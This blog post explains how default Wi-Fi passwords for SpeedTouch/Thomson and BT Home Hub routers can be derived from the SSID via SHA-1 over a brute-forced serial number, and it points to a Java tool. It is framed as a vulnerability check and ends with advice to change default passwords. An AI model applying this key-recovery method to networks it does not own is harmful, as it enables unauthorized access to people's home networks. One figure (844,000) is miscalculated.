Default password generation of BT Home and Thompson routers

In 2008, the default password generation algorithm was reverse engineered and published. Now, in June 2017, there are not a lot of routers available which are still influenced by this discovery, neither are most programs which generate the default password based on an SSID of a network. Based on the information given in the blogpost of GNU Citizen, I wrote an application in Java which generates these keys. The goal of this application is to enable users to see if they’re vulnerable. Even though the information was published nearly ten years ago, there are still quite some routers around which are influenced. Last year I saw three vulnerable routers at friends of mine. Even though the information is old, there are still potential victims out there.

Note that this program is based on the research of Kevin Devine <wyse101[at]gmail[dot]com> which was published on March 15th 2008.

Explaining the algorithm
The basic information that is needed is the SSID of a network. SSID stands for Service Set IDentifier, commonly referred to as the name of your Wi-Fi. The default SSID in the example is SpeedTouchF8A3D0. The last six alphanumeric characters of the SSID are the information that we need to calculate the default password: F8A3D0. This is also the information that needs to be entered in the program.

The serial number of the whole device has the following format:
CP YY WW PP XXX (CC)

CP are two default characters, they might be an abbreviation though there is no more information about this.
YY is the year in which the router is produced.
WW is the week in which the router is produced, of the given year (YY).
PP is the production code.
XXX is the unit number of the given week (WW) in the given year (YY).
CC is the configuration code.

Using SHA-1 to hash this string, the first ten characters are the default password, the last six are the SSID.

Analysing the algorithm
Neither PP nor CC are needed in the process to generate the default password. To obtain the password, the options have to be calculated using brute force. Though not all options need to be calculated.

Since CP is always the same, it is a constant and will not change.
The year (YY) contains two digits, regardless of the year: 2001 will be referred to as 01.
The weeks (WW) use the same notation as the years, going from 1 up to 52.
The unit number (XXX) consists of three numbers, ranging from 0 to 9. The total amount of possibilities is (10*10*10) 1000 for one week.
Guessing the total amount of combinations for a given year equals
CP * YY * WW * XXX
1 * 1 * 52 * 1000 = 52 000 options.

Routers nowadays can be used for a long period of time the user does not require a high internet throughput, especially for users who just browse the web and send e-mails.

During the making of the program, I made one assumption: a router is no older than 01-01-2000. If so, that means that the router would pre-date Windows XP, which is highly unlikely. The newer the model, the more likely it is to be found in the wild. Therefore the first year in the calculation cycle is the current year, 2017 at the time of writing. The lowest year that will be calculated is 2000.

The total amount of calculations for the range of 2017 down to 2000 would be (17 * 52 000) 844 000 options. For modern computers, this is a matter of mere seconds.

In this example, there are only a couple of possible keys. The BT Home Hub has only four alphanumeric characters (such as BTHomeHub-20E3), which results in much more possible keys. Though these keys can take minutes to enter manually, a computer can process these keys in seconds when provided in a list.

Conclusion
Regardless if the total time to obtain the password equals seconds or minutes, the result is the same: your entire home network can be compromised in a rather short period of time.

Using the default name and password combination of the router is never a clever idea, regardless if the algorithm is publicly known or not. My advice is therefore to always change the default password and SSID. Giving your own network a recognisable SSID has another advantage: it is easy to find your own network in the ever growing list of Wi-Fi networks.

Project
The project can be found on Github, together with the source code of the program. The Java code has Javadoc and inline comments to clarify other parts of the code.

Note that this program’s only intended purpose is educational usage. Needless to state: illegal use is forbidden and condemned.